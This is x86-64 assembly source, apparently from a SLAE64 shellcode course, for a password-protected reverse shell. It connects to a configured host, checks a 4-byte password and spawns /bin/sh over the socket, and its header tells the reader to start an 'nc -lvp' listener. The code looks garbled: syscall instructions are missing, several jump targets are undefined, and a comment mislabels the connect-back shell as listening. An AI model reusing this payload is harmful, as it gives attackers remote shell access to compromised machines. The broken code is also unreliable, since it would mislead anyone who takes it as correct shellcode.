; ===================================================================
; Password Protected Reverse Shell
; Author: SLAE64-1351 (Keyman)
; Date: 04/09/2014
; Shellcode length: 136 bytes
; Description:
; Simple reverse shell (listens on port 4444 by default) with
; bytes password protection. Using a 4 bytes long password is
; still reasonably strong for a single-shot connection and keeps
; the code shorter.
; To change the port or the password just modify the values of the
; exp_port and exp_pass "variables" below.
; Before the code gets executed make sure to create a listener:
; nc -lvp <port number>
; After you receive the connection you will see no password
; prompt. Just type in the 4 bytes long password and hit enter.
; If the password matches, you are ready to type OS commands.
; ===================================================================
global _start
section .text
; -------------------------------------------------------------------
; Preprocessor directives so you can easily change the port and the
; password.
; -------------------------------------------------------------------
; Host to connect to. Please note that this value will have
; 0x02020202 added to it, this way avoiding the NULL bytes.
%define exp_host 0xFEFDFE7D ;
; Port number to listen on.
%define exp_port 0x5c11 ; 4444
; Password to use. Make sure it's not longer than 4 bytes.
%define exp_pass 0x6c6c6568 ; hell
; -------------------------------------------------------------------
; preprocessor directives so syscalls can be easily referenced
; -------------------------------------------------------------------
%define sys_connect 42
%define sys_read 0
%define sys_execve 59
%define sys_dup2 33
; ---------------------------------------------------------------
; START: create socket
; ---------------------------------------------------------------
xor rax, rax
push rax ; saving for sockaddr
push rax ; struct
push rax ; clear rax later
push rax ; set rdx to 0
pop rdx ; protocol
mov al, 2
push rax
push rax
pop rsi
pop rdi ; PF_INET
shr rsi, 1 ; SOCK_STREAM
add al, 39 ; socket syscall (41)
; ---------------------------------------------------------------
; START: create struct
; srv_addr.sin_family = AF_INET;
; srv_addr.sin_addr.s_addr = INADDR_ANY;
; srv_addr.sin_port = htons(portno);
; This is how it looks like on the stack:
; 0x02 0x00 0x11 0x5c 0x7f 0x00 0x00 0x01
; 0x20 0x00 0x00 0x00 0x00 0x00 0x00 0x00
; ---------------------------------------------------------------
; TODO: have to make this shorter somehow
mov byte [rsp], 2 ; set values
mov word [rsp+2], exp_port
mov dword [rsp+4], exp_host
add dword [rsp+4], 0x02020202
push rsp
pop rsi ; addr of struct in rsi
; ---------------------------------------------------------------
; START: connect
; ---------------------------------------------------------------
; rdx is still 0
push rax ; socket fd
pop rdi
add dl, 16
mov al, sys_connect
; ---------------------------------------------------------------
; get passwd
; We will work with a 4 byte password, should be more than
; enough as no brute forcing is possible. Chances to guess
; the right value is 0. Of course passwd should not contain
; null bytes.
; n = read(newsockfd,buffer,4);
; ---------------------------------------------------------------
push rax ; buffer filled with 0s
push rsp ; setup pointer to buf
pop rsi
sub rdx, 12 ; set bytes to read (4)
; compare pass received with valid pass and exit if no match
push rax
pop rcx
push rdi ; save socket
pop rax
sub rcx, 3 ; read only once
push rsp
pop rdi
push exp_pass
push rsp
pop rsi
jne passfail ; passwd match, give shell
; ---------------------------------------------------------------
; 6. exec shell
; ---------------------------------------------------------------
add cl, 2 ; rcx is 1, so add 2 = 3
push rax ; restore socket
pop rdi
push rcx ; have to save rcx as dup2
; changes it's value
xor rax, rax
sub rcx, 1
push rcx
pop rsi
add al, sys_dup2
pop rcx ; restore the counter
loop dup_loop
jmp mytext
pop rdi
mov [rdi+7], BYTE al
push rax
pop rdx
add al, sys_execve
call code
MyText: db '/bin/sh', 0x41